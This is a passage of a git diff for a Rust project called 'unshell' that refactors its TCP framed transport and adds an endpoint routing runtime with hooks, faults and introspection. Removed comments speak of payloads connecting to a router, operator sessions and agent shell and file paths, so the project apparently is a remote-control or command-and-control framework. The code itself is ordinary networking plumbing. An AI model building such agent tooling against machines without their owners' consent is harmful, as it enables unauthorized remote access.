&[u8]) -> Result<(), TransportError>; + /// Returns [`TransportError`] when the underlying transport cannot deliver the frame. + fn send_frame(&mut self, frame: FrameBytes) -> Result<(), TransportError>; - /// Receive one complete packet from this transport. - /// - /// Blocks until a full header+payload pair is available. + /// Receives one complete framed packet. /// /// # Errors /// - /// Returns [`TransportError::Disconnected`] if the remote closes cleanly, - /// [`TransportError::Io`] on I/O errors, [`TransportError::HeaderTooLarge`] - /// or [`TransportError::PayloadTooLarge`] if a size limit is exceeded, - /// and [`TransportError::DeserialiseError`] if the header cannot be decoded. - fn recv(&mut self) -> Result<(PacketHeader, Vec), TransportError>; -} - -// --------------------------------------------------------------------------- -// Frame encoding helpers (shared by all transport implementations) -// --------------------------------------------------------------------------- - -/// Encode a `PacketHeader` to bytes using rkyv. -/// -/// Returns the serialised byte vector, or `None` if serialisation fails. -/// -/// This is a low-level helper; transport implementations call it in `send()`. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{PacketHeader, PacketType}; -/// use unshell::transport::encode_header; -/// -/// let header = PacketHeader { -/// dst_path: "/router".into(), -/// src_path: "/agents/abc123".into(), -/// packet_type: PacketType::Handshake, -/// }; -/// let bytes = encode_header(&header).expect("serialisation should not fail"); -/// assert!(!bytes.is_empty()); -/// ``` -pub fn encode_header(header: &PacketHeader) -> Option> { - rkyv::to_bytes::(header).ok().map(|b| b.to_vec()) -} - -/// Decode a `PacketHeader` from rkyv bytes. -/// -/// Returns `Err(TransportError::DeserialiseError)` if the bytes are invalid. -/// -/// This is a low-level helper; transport implementations call it in `recv()`. -/// -/// # Example -/// -/// ```rust -/// use unshell::protocol::{PacketHeader, PacketType}; -/// use unshell::transport::{encode_header, decode_header}; -/// -/// let header = PacketHeader { -/// dst_path: "/router".into(), -/// src_path: "/agents/abc123".into(), -/// packet_type: PacketType::Handshake, -/// }; -/// let bytes = encode_header(&header).unwrap(); -/// let decoded = decode_header(&bytes).unwrap(); -/// assert_eq!(decoded.dst_path, "/router"); -/// ``` -pub fn decode_header(bytes: &[u8]) -> Result { - rkyv::from_bytes::(bytes) - .map_err(|_| TransportError::DeserialiseError) + /// Returns [`TransportError`] when the transport disconnects or a frame cannot be read. + fn recv_frame(&mut self) -> Result; } diff --git a/src/transport/tcp.rs b/src/transport/tcp.rs index 73f888d..151a3c6 100644 --- a/src/transport/tcp.rs +++ b/src/transport/tcp.rs @@ -1,390 +1,132 @@ -//! # TCP Transport -//! -//! Only available when the `tcp` feature is enabled (requires `std`). -//! This file is only included in the module tree when `cfg(feature = "tcp")`, -//! as declared in `transport/mod.rs`. -//! -//! [`TcpTransport`] implements [`Transport`](super::Transport) over a -//! `std::net::TcpStream`. -//! -//! ## Framing -//! -//! Each `send` call writes: -//! -//! ```text -//! [u32 big-endian header_len] [header bytes] -//! [u32 big-endian payload_len] [payload bytes] -//! ``` -//! -//! Each `recv` call: -//! 1. Reads exactly 4 bytes → `header_len`. -//! 2. Checks `header_len <= MAX_HEADER_BYTES`. -//! 3. Reads exactly `header_len` bytes. -//! 4. Deserialises the `PacketHeader`. -//! 5. Reads exactly 4 bytes → `payload_len`. -//! 6. Checks `payload_len <= MAX_PAYLOAD_BYTES`. -//! 7. Reads exactly `payload_len` bytes. -//! 8. Returns `(header, payload)`. -//! -//! **All reads use `read_exact`.** TCP is a stream protocol; a single `read` -//! may return fewer bytes than requested. `read_exact` loops until it has -//! the full count or the stream ends. -//! -//! ## Reconnection -//! -//! `TcpTransport` does not handle reconnection internally. The caller (the -//! payload's main loop or the operator CLI) is responsible for catching -//! [`TransportError::Disconnected`] and [`TransportError::Io`], then -//! creating a new `TcpTransport` to the router address. +//! TCP framed transport. -extern crate alloc; -use alloc::vec; use alloc::vec::Vec; - -use std::io::{Read, Write}; -use std::net::{TcpStream, ToSocketAddrs}; - -use super::{ - decode_header, encode_header, TransportError, Transport, MAX_HEADER_BYTES, MAX_PAYLOAD_BYTES, +use std::{ + io::{ErrorKind, Read, Write}, + net::{TcpStream, ToSocketAddrs}, }; -use crate::protocol::PacketHeader; -/// A framed TCP transport wrapping a `TcpStream`. -/// -/// # Example: connecting as a payload -/// -/// ```rust,no_run -/// use unshell::transport::tcp::TcpTransport; -/// -/// // Connect to the router -/// let transport = TcpTransport::connect("127.0.0.1:9000").expect("connection failed"); -/// ``` -/// -/// # Example: accepting a connection on the router -/// -/// ```rust,no_run -/// use std::net::TcpListener; -/// use unshell::transport::tcp::TcpTransport; -/// -/// let listener = TcpListener::bind("0.0.0.0:9000").unwrap(); -/// for stream in listener.incoming() { -/// let transport = TcpTransport::from_stream(stream.unwrap()); -/// // hand off to a node thread -/// } -/// ``` +use crate::{ + protocol::FrameBytes, + transport::{MAX_HEADER_BYTES, MAX_PAYLOAD_BYTES, Transport, TransportError}, +}; + +/// Framed TCP transport. pub struct TcpTransport { stream: TcpStream, } impl TcpTransport { - /// Connect to a remote address and return a transport wrapping that connection. + /// Connects to a remote address. /// /// # Errors /// - /// Returns [`TransportError::Io`] if the connection fails. - /// - /// # Example - /// - /// ```rust,no_run - /// use unshell::transport::tcp::TcpTransport; - /// let t = TcpTransport::connect("127.0.0.1:9000").unwrap(); - /// ``` + /// Returns [`TransportError`] when the TCP connection cannot be established. pub fn connect(addr: A) -> Result { - let stream = TcpStream::connect(addr)?; - Ok(Self { stream }) + Ok(Self { + stream: TcpStream::connect(addr)?, + }) } - /// Wrap an already-connected `TcpStream`. - /// - /// Used by the router's accept loop, which creates streams via - /// `TcpListener::incoming()`. - /// - /// # Example - /// - /// ```rust,no_run - /// use std::net::TcpListener; - /// use unshell::transport::tcp::TcpTransport; - /// - /// let listener = TcpListener::bind("0.0.0.0:9000").unwrap(); - /// let (stream, _addr) = listener.accept().unwrap(); - /// let transport = TcpTransport::from_stream(stream); - /// ``` + /// Wraps an existing TCP stream. pub fn from_stream(stream: TcpStream) -> Self { Self { stream } } - - /// Access the underlying `TcpStream` for configuration (e.g., timeouts). - /// - /// # Example - /// - /// ```rust,no_run - /// use unshell::transport::tcp::TcpTransport; - /// use std::time::Duration; - /// - /// let t = TcpTransport::connect("127.0.0.1:9000").unwrap(); - /// t.stream_ref().set_read_timeout(Some(Duration::from_secs(5))).unwrap(); - /// ``` - pub fn stream_ref(&self) -> &TcpStream { - &self.stream - } } impl Transport for TcpTransport { - /// Send a packet (header + payload) over the TCP stream. - /// - /// Writes the two-part frame atomically from the caller's perspective: - /// this call does not return until all bytes have been written or an - /// error occurs. - /// - /// # Errors - /// - /// - [`TransportError::Io`] on write failure or partial write. - /// - [`TransportError::Disconnected`] if the remote closed the connection. - fn send(&mut self, header: &PacketHeader, payload: &[u8]) -> Result<(), TransportError> { - // Serialise the header - let header_bytes = - encode_header(header).ok_or(TransportError::DeserialiseError)?; - - // Build the full frame in one allocation so we can use a single - // write_all() call, reducing the chance of partial writes causing - // the remote to see a split frame. - // - // Frame layout: - // [u32 header_len][header bytes][u32 payload_len][payload bytes] - let header_len = header_bytes.len() as u32; - let payload_len = payload.len() as u32; - - let mut frame = - Vec::with_capacity(8 + header_bytes.len() + payload.len()); - frame.extend_from_slice(&header_len.to_be_bytes()); - frame.extend_from_slice(&header_bytes); - frame.extend_from_slice(&payload_len.to_be_bytes()); - frame.extend_from_slice(payload); - - self.stream.write_all(&frame).map_err(|e| { - if e.kind() == std::io::ErrorKind::BrokenPipe - || e.kind() == std::io::ErrorKind::ConnectionReset - || e.kind() == std::io::ErrorKind::UnexpectedEof - { - TransportError::Disconnected - } else { - TransportError::Io(e) - } - }) + fn send_frame(&mut self, frame: FrameBytes) -> Result<(), TransportError> { + self.stream.write_all(&frame).map_err(map_io_error) } - /// Receive one complete packet from the TCP stream. - /// - /// Blocks until a full header+payload pair is available. - /// - /// # Errors - /// - /// - [`TransportError::Disconnected`] if the remote closed cleanly (EOF). - /// - [`TransportError::Io`] on I/O errors. - /// - [`TransportError::HeaderTooLarge`] if the announced header size - /// exceeds [`MAX_HEADER_BYTES`]. - /// - [`TransportError::PayloadTooLarge`] if the announced payload size - /// exceeds [`MAX_PAYLOAD_BYTES`]. - /// - [`TransportError::DeserialiseError`] if the header bytes are invalid. - fn recv(&mut self) -> Result<(PacketHeader, Vec), TransportError> { - // --- Step 1: Read header length (4 bytes) --- + fn recv_frame(&mut self) -> Result { let header_len = read_u32(&mut self.stream)?; if header_len > MAX_HEADER_BYTES { return Err(TransportError::HeaderTooLarge(header_len, MAX_HEADER_BYTES)); } - // --- Step 2: Read header bytes --- - let mut header_buf = vec![0u8; header_len]; - read_exact(&mut self.stream, &mut header_buf)?; + let mut header = vec![0u8; header_len]; + read_exact(&mut self.stream, &mut header)?; - // --- Step 3: Deserialise header --- - let header = decode_header(&header_buf)?; - - // --- Step 4: Read payload length (4 bytes) --- let payload_len = read_u32(&mut self.stream)?; if payload_len > MAX_PAYLOAD_BYTES { - return Err(TransportError::PayloadTooLarge(payload_len, MAX_PAYLOAD_BYTES)); + return Err(TransportError::PayloadTooLarge( + payload_len, + MAX_PAYLOAD_BYTES, + )); } - // --- Step 5: Read payload bytes --- let mut payload = vec![0u8; payload_len]; read_exact(&mut self.stream, &mut payload)?; - Ok((header, payload)) + let mut frame = Vec::with_capacity(8 + header_len + payload_len); + frame.extend_from_slice(&(header_len as u32).to_be_bytes()); + frame.extend_from_slice(&header); + frame.extend_from_slice(&(payload_len as u32).to_be_bytes()); + frame.extend_from_slice(&payload); + Ok(frame.into_boxed_slice()) } } -// --------------------------------------------------------------------------- -// Internal helpers -// --------------------------------------------------------------------------- - -/// Read exactly 4 bytes from `stream` and interpret them as a big-endian `u32`. -/// -/// Returns [`TransportError::Disconnected`] on clean EOF (zero bytes read), -/// or [`TransportError::Io`] on other errors. fn read_u32(stream: &mut TcpStream) -> Result { - let mut buf = [0u8; 4]; - read_exact(stream, &mut buf)?; - Ok(u32::from_be_bytes(buf) as usize) + let mut bytes = [0u8; 4]; + read_exact(stream, &mut bytes)?; + Ok(u32::from_be_bytes(bytes) as usize) } -/// Read exactly `buf.len()` bytes from `stream`. -/// -/// Unlike `stream.read()`, this function loops until the buffer is full or -/// an error occurs. This is essential for TCP, which may deliver data in -/// smaller chunks than requested. -/// -/// Returns [`TransportError::Disconnected`] on clean EOF, -/// [`TransportError::Io`] on I/O errors. -fn read_exact(stream: &mut TcpStream, buf: &mut [u8]) -> Result<(), TransportError> { - stream.read_exact(buf).map_err(|e| { - if e.kind() == std::io::ErrorKind::UnexpectedEof - || e.kind() == std::io::ErrorKind::ConnectionReset - { +fn read_exact(stream: &mut TcpStream, buffer: &mut [u8]) -> Result<(), TransportError> { + stream.read_exact(buffer).map_err(map_io_error) +} + +fn map_io_error(error: std::io::Error) -> TransportError { + match error.kind() { + ErrorKind::UnexpectedEof | ErrorKind::BrokenPipe | ErrorKind::ConnectionReset => { TransportError::Disconnected - } else { - TransportError::Io(e) } - }) + _ => TransportError::Io(error), + } } -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - #[cfg(test)] mod tests { use super::*; - use crate::protocol::PacketType; - use std::net::TcpListener; - use std::thread; + use crate::protocol::{DataMessage, PacketHeader, PacketType, decode_frame, encode_packet}; + use alloc::{string::String, vec}; + use std::{net::TcpListener, thread}; - /// Test that a packet sent through a real TcpStream arrives intact. - /// - /// This test spins up a local listener on an ephemeral port, sends one - /// packet from one thread, and verifies the other receives it correctly. #[test] - fn roundtrip_over_real_tcp() { - let listener = TcpListener::bind("127.0.0.1:0").expect("bind failed"); - let addr = listener.local_addr().expect("local_addr failed"); + fn tcp_roundtrip_preserves_frame() { + let listener = TcpListener::bind("127.0.0.1:0").expect("bind should succeed"); + let addr = listener.local_addr().expect("local address should exist"); - let header_sent = PacketHeader { - dst_path: "/agents/test/shell".into(), - src_path: "/operator/sess1".into(), - packet_type: PacketType::Request, + let header = PacketHeader { + packet_type: PacketType::Data, + src_path: vec![String::from("a")], + dst_path: vec![String::from("b")], + dst_leaf: None, + hook_id: Some(9), }; - let payload_sent = b"hello world".to_vec(); + let payload = DataMessage { + procedure_id: String::from("org.product.v1.echo.roundtrip"), + data: b"payload".to_vec(), + end_hook: true, + }; + let frame = encode_packet(&header, &payload).expect("frame should encode"); - let header_clone = header_sent.clone(); - let payload_clone = payload_sent.clone(); - - // Sender thread let sender = thread::spawn(move || { - let stream = TcpStream::connect(addr).expect("connect failed"); - let mut transport = TcpTransport::from_stream(stream); - transport - .send(&header_clone, &payload_clone) - .expect("send failed"); + let mut transport = TcpTransport::connect(addr).expect("connect should succeed"); + transport.send_frame(frame).expect("send should succeed"); }); - // Receiver (main thread) - let (stream, _) = listener.accept().expect("accept failed"); + let (stream, _) = listener.accept().expect("accept should succeed"); let mut transport = TcpTransport::from_stream(stream); - let (header_recv, payload_recv) = transport.recv().expect("recv failed"); + let received = transport.recv_frame().expect("recv should succeed"); + let parsed = decode_frame(&received).expect("frame should decode"); - sender.join().expect("sender thread panicked"); - - assert_eq!(header_recv.dst_path, header_sent.dst_path); - assert_eq!(header_recv.src_path, header_sent.src_path); - assert_eq!(header_recv.packet_type, header_sent.packet_type); - assert_eq!(payload_recv, payload_sent); - } - - /// Test that an empty payload round-trips correctly. - #[test] - fn roundtrip_empty_payload() { - let listener = TcpListener::bind("127.0.0.1:0").expect("bind failed"); - let addr = listener.local_addr().expect("local_addr failed"); - - let header = PacketHeader { - dst_path: "/router/ping".into(), - src_path: "/operator/sess1".into(), - packet_type: PacketType::Request, - }; - - let header_clone = header.clone(); - let sender = thread::spawn(move || { - let stream = TcpStream::connect(addr).expect("connect failed"); - let mut t = TcpTransport::from_stream(stream); - t.send(&header_clone, &[]).expect("send failed"); - }); - - let (stream, _) = listener.accept().expect("accept failed"); - let mut t = TcpTransport::from_stream(stream); - let (recv_header, recv_payload) = t.recv().expect("recv failed"); - - sender.join().expect("sender thread panicked"); - - assert_eq!(recv_header.dst_path, "/router/ping"); - assert!(recv_payload.is_empty()); - } - - /// Test that a large payload (1 MB) survives the TCP framing. - #[test] - fn roundtrip_large_payload() { - let listener = TcpListener::bind("127.0.0.1:0").expect("bind failed"); - let addr = listener.local_addr().expect("local_addr failed"); - - let payload: Vec = (0..1_000_000u32).map(|i| (i % 256) as u8).collect(); - let payload_clone = payload.clone(); - - let header = PacketHeader { - dst_path: "/agents/x/files/read".into(), - src_path: "/operator/sess1".into(), - packet_type: PacketType::Response, - }; - let header_clone = header.clone(); - - let sender = thread::spawn(move || { - let stream = TcpStream::connect(addr).expect("connect failed"); - let mut t = TcpTransport::from_stream(stream); - t.send(&header_clone, &payload_clone).expect("send failed"); - }); - - let (stream, _) = listener.accept().expect("accept failed"); - let mut t = TcpTransport::from_stream(stream); - let (_, recv_payload) = t.recv().expect("recv failed"); - - sender.join().expect("sender thread panicked"); - - assert_eq!(recv_payload, payload); - } - - /// Test that a frame whose announced header size exceeds the limit is rejected - /// without allocating the full buffer. - #[test] - fn rejects_oversized_header() { - let listener = TcpListener::bind("127.0.0.1:0").expect("bind failed"); - let addr = listener.local_addr().expect("local_addr failed"); - - let sender = thread::spawn(move || { - let mut stream = TcpStream::connect(addr).expect("connect failed"); - // Write an enormous header length - let huge_len = (MAX_HEADER_BYTES + 1) as u32; - stream - .write_all(&huge_len.to_be_bytes()) - .expect("write failed"); - }); - - let (stream, _) = listener.accept().expect("accept failed"); - let mut t = TcpTransport::from_stream(stream); - let result = t.recv(); - - sender.join().expect("sender panicked"); - - assert!( - matches!(result, Err(TransportError::HeaderTooLarge(_, _))), - "expected HeaderTooLarge, got: {result:?}" + sender.join().expect("sender should not panic"); + assert_eq!( + parsed.deserialize_data().expect("data should decode"), + payload ); } } diff --git a/src/tree/endpoint.rs b/src/tree/endpoint.rs new file mode 100644 index 0000000..0e721f2 --- /dev/null +++ b/src/tree/endpoint.rs @@ -0,0 +1,793 @@ +//! Minimal endpoint runtime for protocol tests. + +use alloc::{ + collections::{BTreeMap, BTreeSet}, + string::String, + vec, + vec::Vec, +}; +use core::fmt; +use rkyv::{rancor::Error as RkyvError, to_bytes}; + +use crate::{ + protocol::{ + CallMessage, DataMessage, EndpointIntrospection, FaultMessage, FrameBytes, FrameError, + HookTarget, LeafIntrospection, LeafIntrospectionSummary, PacketHeader, PacketType, + ProtocolFault, decode_frame, encode_packet, introspection::INTROSPECTION_PROCEDURE_ID, + validate_call, validate_header, validate_procedure_id, + }, + tree::{ActiveHook, HookKey, HookTable, PendingHook, RouteDecision, route_destination}, +}; + +/// Local connection state defined by the protocol. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum ConnectionState { + /// Connected but not routable. + Unregistered, + /// Admitted into local routing. + Registered, +} + +/// Registered child route. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct ChildRoute { + /// Child endpoint path. + pub path: Vec, + /// Local connection state. + pub state: ConnectionState, +} + +impl ChildRoute { + /// Creates a registered child route. + pub fn registered(path: Vec) -> Self { + Self { + path, + state: ConnectionState::Registered, + } + } +} + +/// Basic leaf behavior used by the test protocol runtime. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum LeafBehavior { + /// Echoes the call data back in one `Data` packet. + Echo, +} + +/// Static leaf description. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct LeafSpec { + /// Local leaf name. + pub name: String, + /// Supported procedures. + pub procedures: Vec, + /// Test behavior. + pub behavior: LeafBehavior, +} + +/// How a packet arrived at the endpoint. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum Ingress { + /// From the direct parent. + Parent, + /// From a direct child path. + Child(Vec), + /// Originated locally. + Local, +} + +/// Locally delivered events produced by protocol processing. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum LocalEvent { + /// A supported local call with no response hook. + Call { + header: PacketHeader, + message: CallMessage, + }, + /// Locally delivered data. + Data { + header: PacketHeader, + message: DataMessage, + }, + /// Locally delivered or synthesized fault. + Fault { + header: PacketHeader, + message: FaultMessage, + }, +} + +/// Output from processing one frame. +#[derive(Debug, Default)] +pub struct EndpointOutcome { + /// Frames to forward. The frame bytes are moved, not cloned. + pub forwards: Vec<(RouteDecision, FrameBytes)>, + /// Events delivered locally. + pub events: Vec, + /// Whether the packet was silently dropped. + pub dropped: bool, +} + +/// Endpoint processing failure. +#[derive(Debug)] +pub enum EndpointError { + /// Frame parsing failed. + Frame(FrameError), + /// Validation failed. + Validation(crate::protocol::ValidationError), +} + +impl fmt::Display for EndpointError { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Frame(error) => write!(f, "{error}"), + Self::Validation(error) => write!(f, "{error}"), + } + } +} + +#[cfg(feature = "std")] +impl std::error::Error for EndpointError {} + +impl From for EndpointError { + fn from(value: FrameError) -> Self { + Self::Frame(value) + } +} + +impl From for EndpointError { + fn from(value: crate::protocol::ValidationError) -> Self { + Self::Validation(value) + } +} + +/// Local endpoint model suitable for tests and later integration work. +#[derive(Debug, Default)] +pub struct Endpoint { + path: Vec, + parent_path: Option>, + children: Vec, + leaves: BTreeMap, + endpoint_procedures: BTreeSet, + hooks: HookTable, +} + +impl Endpoint { + /// Creates an endpoint with explicit path, parent, children, and leaves. + pub fn new( + path: Vec, + parent_path: Option>, + children: Vec, + leaves: Vec, + ) -> Self { + Self { + path, + parent_path, + children, + leaves: leaves + .into_iter() + .map(|leaf| (leaf.name.clone(), leaf)) + .collect(), + endpoint_procedures: BTreeSet::new(), + hooks: HookTable::default(), + } + } + + /// Returns the local endpoint path. + pub fn path(&self) -> &[String] { + &self.path + } + + /// Returns the hook table for assertions. + pub fn hooks(&self) -> &HookTable { + &self.hooks + } + + /// Registers an endpoint-level procedure. + /// + /// # Errors + /// + /// Returns [`EndpointError`] when the procedure id is invalid. + pub fn add_endpoint_procedure( + &mut self, + procedure_id: impl Into, + ) -> Result<(), EndpointError> { + let procedure_id = procedure_id.into(); + validate_procedure_id(&procedure_id)?; + self.endpoint_procedures.insert(procedure_id); + Ok(()) + } + + /// Allocates a new local hook id. + pub fn allocate_hook_id(&self) -> u64 { + self.hooks.allocate_hook_id(&self.path) + } + + /// Creates an outbound `Call` frame and registers host-side hook state when needed. + /// + /// # Errors + /// + /// Returns [`EndpointError`] when validation or framing fails. + pub fn make_call( + &mut self, + dst_path: Vec, + dst_leaf: Option, + procedure_id: impl Into, + response_hook_id: Option, + data: Vec, + ) -> Result { + let procedure_id = procedure_id.into(); + validate_procedure_id(&procedure_id)?; + let response_hook = response_hook_id.map(|hook_id| HookTarget { + hook_id, + return_path: self.path.clone(), + }); + let header = PacketHeader { + packet_type: PacketType::Call, + src_path: self.path.clone(), + dst_path: dst_path.clone(), + dst_leaf: dst_leaf.clone(), + hook_id: None, + }; + let call = CallMessage { + procedure_id: procedure_id.clone(), + data, + response_hook, + }; + validate_header(&header)?; + validate_call(&header, &call)?; + + if let Some(hook) = &call.response_hook { + self.hooks.insert_active(ActiveHook { + return_path: hook.return_path.clone(), + hook_id: hook.hook_id, + peer_path: dst_path, + procedure_id, + dst_leaf, + peer_finished: false, + }); + } + + Ok(encode_packet(&header, &call)?) + } + + /// Creates an outbound `Data` frame. + /// + /// # Errors + /// + /// Returns [`EndpointError`] when validation or framing fails. + pub fn make_data( + &self, + dst_path: Vec, + hook_id: u64, + procedure_id: impl Into, + data: Vec, + end_hook: bool, + ) -> Result { + let procedure_id = procedure_id.into(); + validate_procedure_id(&procedure_id)?; + let header = PacketHeader { + packet_type: PacketType::Data, + src_path: self.path.clone(), + dst_path, + dst_leaf: None, + hook_id: Some(hook_id), + }; + let message = DataMessage { + procedure_id, + data, + end_hook, + }; + validate_header(&header)?; + Ok(encode_packet(&header, &message)?) + } + + /// Processes one framed packet. + /// + /// # Errors + /// + /// Returns [`EndpointError`] when frame decoding or validation fails. + pub fn receive( + &mut self, + ingress: &Ingress, + frame: FrameBytes, + ) -> Result { + enum OwnedPayload { + Call(PacketHeader, CallMessage), + Data(PacketHeader, DataMessage), + Fault(PacketHeader, FaultMessage), + } + + let owned = { + let parsed = decode_frame(&frame)?; + let header = parsed.deserialize_header(); + validate_header(&header)?; + match header.packet_type { + PacketType::Call => OwnedPayload::Call(header, parsed.deserialize_call()?), + PacketType::Data => OwnedPayload::Data(header, parsed.deserialize_data()?), + PacketType::Fault => OwnedPayload::Fault(header, parsed.deserialize_fault()?), + } + }; + + let src_path = match &owned { + OwnedPayload::Call(header, _) => &header.src_path, + OwnedPayload::Data(header, _) => &header.src_path, + OwnedPayload::Fault(header, _) => &header.src_path, + }; + + if !self.valid_source_for_ingress(ingress, src_path) { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + } + + match owned { + OwnedPayload::Call(header, message) => { + self.receive_call(ingress, frame, header, message) + } + OwnedPayload::Data(header, message) => self.receive_data(header, message), + OwnedPayload::Fault(header, message) => self.receive_fault(header, message), + } + } + + fn receive_call( + &mut self, + ingress: &Ingress, + frame: FrameBytes, + header: PacketHeader, + message: CallMessage, + ) -> Result { + if !matches!(ingress, Ingress::Parent | Ingress::Local) { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + } + + validate_call(&header, &message)?; + match self.decide_route(&header.dst_path) { + RouteDecision::Child(index) => Ok(EndpointOutcome { + forwards: vec![(RouteDecision::Child(index), frame)], + ..EndpointOutcome::default() + }), + RouteDecision::Parent => Ok(EndpointOutcome { + forwards: vec![(RouteDecision::Parent, frame)], + ..EndpointOutcome::default() + }), + RouteDecision::Drop => Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }), + RouteDecision::Local => self.handle_local_call(header, message), + } + } + + fn receive_data( + &mut self, + header: PacketHeader, + message: DataMessage, + ) -> Result { + match self.decide_route(&header.dst_path) { + RouteDecision::Child(_) | RouteDecision::Parent => Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }), + RouteDecision::Drop => Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }), + RouteDecision::Local => self.handle_local_data(header, message), + } + } + + fn receive_fault( + &mut self, + header: PacketHeader, + message: FaultMessage, + ) -> Result { + match self.decide_route(&header.dst_path) { + RouteDecision::Child(_) | RouteDecision::Parent => Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }), + RouteDecision::Drop => Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }), + RouteDecision::Local => { + let key = HookKey::new( + self.path.clone(), + header.hook_id.expect("validated hook id"), + ); + let matches_active = self + .hooks + .active(&key) + .map(|active| active.peer_path == header.src_path) + .unwrap_or(false); + let matches_pending = self + .hooks + .pending(&key) + .map(|pending| pending.caller_src_path == header.src_path) + .unwrap_or(false); + if !(matches_active || matches_pending) { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + } + self.hooks.remove_active(&key); + self.hooks.remove_pending(&key); + Ok(EndpointOutcome { + events: vec![LocalEvent::Fault { header, message }], + ..EndpointOutcome::default() + }) + } + } + } + + fn handle_local_call( + &mut self, + header: PacketHeader, + message: CallMessage, + ) -> Result { + let key = message + .response_hook + .as_ref() + .map(|hook| HookKey::new(hook.return_path.clone(), hook.hook_id)); + + if let Some(hook) = &message.response_hook { + self.hooks.insert_pending(PendingHook { + caller_src_path: header.src_path.clone(), + return_path: hook.return_path.clone(), + hook_id: hook.hook_id, + procedure_id: message.procedure_id.clone(), + dst_leaf: header.dst_leaf.clone(), + }); + } + + if message.procedure_id == INTROSPECTION_PROCEDURE_ID { + return self.handle_introspection(&header, key); + } + + let supported = match &header.dst_leaf { + Some(leaf_name) => self + .leaves + .get(leaf_name) + .map(|leaf| { + leaf.procedures + .iter() + .any(|candidate| candidate == &message.procedure_id) + }) + .unwrap_or(false), + None => self.endpoint_procedures.contains(&message.procedure_id), + }; + + if !supported { + let fault = if header + .dst_leaf + .as_ref() + .is_some_and(|leaf_name| !self.leaves.contains_key(leaf_name)) + { + ProtocolFault::UnknownLeaf + } else { + ProtocolFault::UnknownProcedure + }; + return self.emit_fault_if_possible(key, fault); + } + + if let Some(key) = &key { + self.hooks.activate_pending(key, header.src_path.clone()); + } + + match header + .dst_leaf + .as_ref() + .and_then(|leaf_name| self.leaves.get(leaf_name)) + { + Some(LeafSpec { + behavior: LeafBehavior::Echo, + .. + }) if key.is_some() => { + let hook = message + .response_hook + .expect("key and hook are synchronized"); + let response = DataMessage { + procedure_id: message.procedure_id.clone(), + data: message.data, + end_hook: true, + }; + let response_header = PacketHeader { + packet_type: PacketType::Data, + src_path: self.path.clone(), + dst_path: hook.return_path.clone(), + dst_leaf: None, + hook_id: Some(hook.hook_id), + }; + let frame = encode_packet(&response_header, &response)?; + self.hooks + .remove_active(&HookKey::new(hook.return_path, hook.hook_id)); + Ok(EndpointOutcome { + forwards: vec![(RouteDecision::Parent, frame)], + ..EndpointOutcome::default() + }) + } + _ => Ok(EndpointOutcome { + events: vec![LocalEvent::Call { header, message }], + ..EndpointOutcome::default() + }), + } + } + + fn handle_introspection( + &mut self, + header: &PacketHeader, + key: Option, + ) -> Result { + let Some(key) = key else { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + }; + self.hooks.activate_pending(&key, header.src_path.clone()); + + let payload = if let Some(leaf_name) = &header.dst_leaf { + let Some(leaf) = self.leaves.get(leaf_name) else { + return self.emit_fault_if_possible(Some(key), ProtocolFault::UnknownLeaf); + }; + // WARNING: introspection nests one archived payload inside `DataMessage.data`. + // This inner allocation is required because the protocol defines `data` as opaque bytes. + to_bytes::(&LeafIntrospection { + leaf_name: leaf_name.clone(), + procedures: leaf.procedures.clone(), + }) + .expect("leaf introspection should serialize") + .to_vec() + } else { + to_bytes::(&EndpointIntrospection { + leaves: self + .leaves + .values() + .map(|leaf| LeafIntrospectionSummary { + leaf_name: leaf.name.clone(), + procedures: leaf.procedures.clone(), + }) + .collect(), + }) + .expect("endpoint introspection should serialize") + .to_vec() + }; + + let response_header = PacketHeader { + packet_type: PacketType::Data, + src_path: self.path.clone(), + dst_path: key.return_path.clone(), + dst_leaf: None, + hook_id: Some(key.hook_id), + }; + let response = DataMessage { + procedure_id: String::new(), + data: payload, + end_hook: true, + }; + let frame = encode_packet(&response_header, &response)?; + self.hooks.remove_active(&key); + Ok(EndpointOutcome { + forwards: vec![(RouteDecision::Parent, frame)], + ..EndpointOutcome::default() + }) + } + + fn handle_local_data( + &mut self, + header: PacketHeader, + message: DataMessage, + ) -> Result { + let key = HookKey::new( + self.path.clone(), + header.hook_id.expect("validated hook id"), + ); + + if self.hooks.active(&key).is_none() { + let pending_matches = self + .hooks + .pending(&key) + .map(|pending| { + pending.caller_src_path == header.src_path + && pending.procedure_id == message.procedure_id + }) + .unwrap_or(false); + if pending_matches { + self.hooks.activate_pending(&key, header.src_path.clone()); + } + } + + let Some(active) = self.hooks.active(&key).cloned() else { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + }; + + if active.peer_path != header.src_path || active.procedure_id != message.procedure_id { + self.hooks.remove_active(&key); + self.hooks.remove_pending(&key); + return Ok(EndpointOutcome { + events: vec![LocalEvent::Fault { + header: PacketHeader { + packet_type: PacketType::Fault, + src_path: header.src_path, + dst_path: self.path.clone(), + dst_leaf: None, + hook_id: Some(key.hook_id), + }, + message: FaultMessage { + fault: ProtocolFault::InvalidHookPeer, + }, + }], + ..EndpointOutcome::default() + }); + } + + if message.end_hook { + self.hooks.remove_active(&key); + } + + Ok(EndpointOutcome { + events: vec![LocalEvent::Data { header, message }], + ..EndpointOutcome::default() + }) + } + + fn emit_fault_if_possible( + &mut self, + key: Option, + fault: ProtocolFault, + ) -> Result { + let Some(key) = key else { + return Ok(EndpointOutcome { + dropped: true, + ..EndpointOutcome::default() + }); + }; + self.hooks.remove_pending(&key); + self.hooks.remove_active(&key); + let 